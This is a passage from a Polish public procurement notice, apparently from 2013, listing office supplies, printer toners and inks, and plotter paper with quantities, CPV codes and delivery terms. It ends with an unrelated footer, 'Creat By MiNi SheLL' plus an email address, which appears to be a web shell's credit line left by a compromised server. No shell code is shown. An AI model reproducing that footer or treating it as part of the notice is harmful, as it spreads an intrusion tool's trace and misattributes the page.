Klej biurowy wysokiej jakości, nie marszczący papieru, do papieru, fotografii, tektury t.Esselte , 17 g
szt
80
32
Linijka 20 cm
szt
20
33
Mechanizm skoroszytowy (wpinka)
szt
500
34
Nożyczki 21 cm, stalowe z rączką 
z tworzywa sztucznego   
szt
10
35
Okładka do bindowania A4 (100szt), czarna
opak
2
36
Ołówek zwykły HB, bez gumki
szt
24
37
Papier ksero A3, CIE 161, 80 g/m2 (500szt) załączyć certyfikat
ryza
50
38
Papier ksero A4, CIE 161, 80 g/m2 (500szt) załączyć certyfikat
ryza
1000
39
Płyta Blu-ray (5szt)
opak
2
40
Rolka termiczna 57x30 /10/
opak
6
41
Rozszywacz
szt
10
42
Segregator kolorowe A4, 50 mm t. Esselte
szt
200
43
Segregator kolorowe A4, 75 mm t. Esselte
szt
200
44
Skoroszyt zawieszkowy ? A4, biały, kartonowy, bezkwasowy
szt
250
45
Skoroszyt zawieszkowy A4, biały, kartonowy, bezkwasowy
szt
150
46
Skoroszyt oczkowy A4, biały, kartonowy, bezkwasowy
szt
300
47
Skoroszyt zwykły, biały A4 , bezkwasowy
szt
100
48
Skoroszyt plastikowy A4 , kolorowy
szt
100
49
Skoroszyt A4 twardy PCV z oczkami, kolorowy
szt
500
50
Spinacze metalowe okrągłe 28mm (100 szt)
opak
150
51
Taśma klejąca 24mm x 10m
szt
60
52
Tusz do stempli czerwony / dobry czerwony/
szt
10
53
Teczka papierowa wiązana A4 , biała na większą ilość dokumentów, bezkwasowa
szt
500
54
Zakładki indeksujące 8 x prostokąt 45 x 12,  kolorowe
szt
20
55
Zeszyt A4 z twarda okładką, kratka
szt
30
56
Zakreślacz kolorowy (żółty, zielony, pomarańczowy, czerwony)
szt
80
57
Zszywacz do min. 40 kartek
szt
10
58
Zszywki 24/6 t. Esselte (1000szt)
opak
200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa materiałów eksploatacyjnych do kserokopiarek i drukarek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
      Nazwa przedmiotu
Jedn.
   Ilość
1
Atrament  HP 3550 trójkolorowy, 8 ml
Szt.
4
2
Atrament  HP 3550,czarny,  10 ml
Szt.
8
3
Atrament HP 5652 czarny, 19 ml
Szt.
4
4
Atrament HP 5652 trójkolorowy, 17 ml
Szt.
2
5
Zestaw atramentów sublimacyjnych 6 kolorów 100ml do drukarki Epson P50
kpl
2
6
Zestaw atramentów 6 kolorów 100ml do drukarki Epson P50
kpl
3
7
Toner HP LJ 1100, 2500 kopii
Szt.
2
8
Toner HP LJ 2820 czarny, 5000 kopii
Szt.
1
9
Toner HP LJ 2820 kolor, 4000 kopii, c/m/y, 3 szt
kpl
1
10
Toner OKI C3450,kolor c/m/y 2500 kopii, 3 szt
kpl
1
11
Toner OKI C3450, czarny, 2500 kopii
Szt.
1
12
Toner OKI B  431d, 12000 kopii
Szt.
3
13
Toner Lexmark E120 , 2000 kopii 
Szt.
5
14
Toner Lexmark T640 czarny, 21000 kopii
Szt.
1
15
Toner Samsung ML 2571N, ML1610,  3000 kopii
Szt.
20
16
Toner Samsung ML1640, 1500 kopii
Szt.
3
17
Toner Samsung ML 3051 ND, 8000 kopii
Szt.
2
18
Toner Samsung ML 2955 DW, 2500 kopii
Szt.
2
19
Toner Dell 2230, 3500 kopii
Szt.
20
20
Toner  Dell 2330, 6000 kopii
Szt.
3
21
Toner Ricoh Aficio MP W2401
Szt.
2
22
Toner Ricoh  2016, 9000 kopii
Szt.
3
23
Toner Ricoh  2022, MP 2550 SPC, 2851 MP, 11 000 kopii
Szt.
8
24
Toner Ricoh 2050 PCL6, 10 000 kopii, czarny
Szt.
2
25
Toner Ricoh 2050 PCL6, kolor c/m/y, 9500 kopii
kpl
1
26
Toner Ricoh MPC2800, czarny 20 000 kopii
Szt.
1
27
Toner Ricoh MP C 3002, czarny, 20000 kopii
Szt.
1
28
Toner Ricoh MP C 3002, kolor c/m/y,  18000 kopii
kpl
1
29
Toner Ricoh Aficio SP C232SF, czarny  6500 kopii
Szt.
2
30
Toner Ricoh Aficio SP C232SF, kolor, c/m/y 6000 kopii
kpl
1
31
Toner fax Panasonic  KX-FAT 411E, 2000 kopii
Szt.
2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.13-6, 30.12.51.10-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa materiałów papierniczych do ploterów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.
Nazwa asortymentu
jedn. miary
ilość
1
Papier do plotera Ricoh Aficio MP W2401, wysoka biel, bezpyłowy 80g/m2, 0,841 x 175 m, średnica wewnętrzna rolki 7,6 cm
opak.
4
2
Papier do plotera Ricoh Aficio MP W2401, wysoka biel, bezpyłowy 80g/m2, 0,594 x 175 m, średnica wewnętrzna rolki 7,6 cm
opak.
4
3
Papier do plotera Ricoh Aficio MP W2401, wysoka biel, bezpyłowy 80g/m2, 0,420 x 175 m, średnica wewnętrzna rolki 7,6 cm
opak.
1
4
Papier do plotera HP 510 PS, wysoka biel, bezpyłowy 90g/m2, 0,841 x 110 m, średnica wewnętrzna rolki 5,1 cm
opak.
1
5
Papier do plotera HP 510 PS, wysoka biel, bezpyłowy 90g/m2, 0,594 x 110 m, średnica wewnętrzna rolki 5,1 cm
opak.
1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com